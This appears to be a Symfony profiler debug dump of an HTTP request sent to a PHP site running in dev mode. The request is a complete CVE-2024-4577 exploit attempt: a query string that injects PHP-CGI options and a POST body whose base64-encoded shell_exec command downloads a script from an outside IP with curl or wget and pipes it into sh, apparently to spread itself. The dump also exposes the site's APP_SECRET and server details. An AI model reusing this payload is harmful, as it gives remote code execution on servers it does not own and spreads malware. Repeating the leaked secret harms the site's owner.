n/a
Request
GET Parameters
Key | Value |
---|---|
�d_allow_url_include=1_�d_auto_prepend_file=php://input | "" |
POST Parameters
Key | Value |
---|---|
<?php_shell_exec(base64_decode("WD0kKGN1cmwgaHR0cDovLzk0LjE1Ni4xNzcuMTA5L3NoIHx8IHdnZXQgaHR0cDovLzk0LjE1Ni4xNzcuMTA5L3NoIC1PLSk7IGVjaG8gIiRYIiB8IHNoIC1zIGN2ZV8yMDI0XzQ1Nzcuc2VsZnJlcA | "=")); echo(md5("Hello CVE-2024-4577")); ?>" |
Uploaded Files
No files were uploaded
Request Attributes
Key | Value |
---|---|
_remove_csp_headers | true |
_stopwatch_token | "f86705" |
Request Headers
Header | Value |
---|---|
accept | "*/*" |
connection | "keep-alive" |
content-length | "225" |
content-type | "application/x-www-form-urlencoded" |
host | "54.36.100.98:443" |
upgrade-insecure-requests | "1" |
user-agent | "Custom-AsyncHttpClient" |
x-php-ob-level | "1" |
Request Content
Raw
<?php shell_exec(base64_decode("WD0kKGN1cmwgaHR0cDovLzk0LjE1Ni4xNzcuMTA5L3NoIHx8IHdnZXQgaHR0cDovLzk0LjE1Ni4xNzcuMTA5L3NoIC1PLSk7IGVjaG8gIiRYIiB8IHNoIC1zIGN2ZV8yMDI0XzQ1Nzcuc2VsZnJlcA==")); echo(md5("Hello CVE-2024-4577")); ?>
Response
Response Headers
Header | Value |
---|---|
cache-control | "no-cache, private" |
content-type | "text/html; charset=UTF-8" |
date | "Sun, 29 Sep 2024 03:33:56 GMT" |
x-debug-exception | "No%20route%20found%20for%20%22POST%20https%3A%2F%2F54.36.100.98%2Fhello.world%22" |
x-debug-exception-file | "%2Fvar%2Fwww%2Fmanzowa%2Fvendor%2Fsymfony%2Fhttp-kernel%2FEventListener%2FRouterListener.php:135" |
x-debug-token | "80e5de" |
x-previous-debug-token | "2bf2be" |
x-robots-tag | "noindex" |
Cookies
Request Cookies
No request cookies
Response Cookies
No response cookies
Session
Session Metadata
No session metadata
Session Attributes
No session attributes
Session Usage
0
Usages
Stateless check enabled
Session not used.
Flashes
Flashes
No flash messages were created.
Server Parameters
Server Parameters
Defined in .env
Key | Value |
---|---|
APP_ENV | "dev" |
APP_SECRET | "447f81569522632233937554dd02c22e" |
Defined as regular env variables
Key | Value |
---|---|
APP_DEBUG | "1" |
CONTENT_LENGTH | "225" |
CONTENT_TYPE | "application/x-www-form-urlencoded" |
DOCUMENT_ROOT | "/var/www/manzowa/public" |
DOCUMENT_URI | "/index.php" |
FCGI_ROLE | "RESPONDER" |
GATEWAY_INTERFACE | "CGI/1.1" |
HOME | "/var/www" |
HTTPS | "on" |
HTTP_ACCEPT | "*/*" |
HTTP_CONNECTION | "keep-alive" |
HTTP_CONTENT_LENGTH | "225" |
HTTP_CONTENT_TYPE | "application/x-www-form-urlencoded" |
HTTP_HOST | "54.36.100.98:443" |
HTTP_UPGRADE_INSECURE_REQUESTS | "1" |
HTTP_USER_AGENT | "Custom-AsyncHttpClient" |
PHP_SELF | "/index.php" |
QUERY_STRING | "%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" |
REDIRECT_STATUS | "200" |
REMOTE_ADDR | "157.173.118.6" |
REMOTE_PORT | "39130" |
REMOTE_USER | "" |
REQUEST_METHOD | "POST" |
REQUEST_SCHEME | "https" |
REQUEST_TIME | 1727580836 |
REQUEST_TIME_FLOAT | 1727580836.333 |
REQUEST_URI | "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" |
SCRIPT_FILENAME | "/var/www/manzowa/public/index.php" |
SCRIPT_NAME | "/index.php" |
SERVER_ADDR | "54.36.100.98" |
SERVER_NAME | "manzowa.com" |
SERVER_PORT | "443" |
SERVER_PROTOCOL | "HTTP/1.1" |
SERVER_SOFTWARE | "nginx/1.18.0" |
SYMFONY_DOTENV_VARS | "APP_ENV,APP_SECRET" |
USER | "www-data" |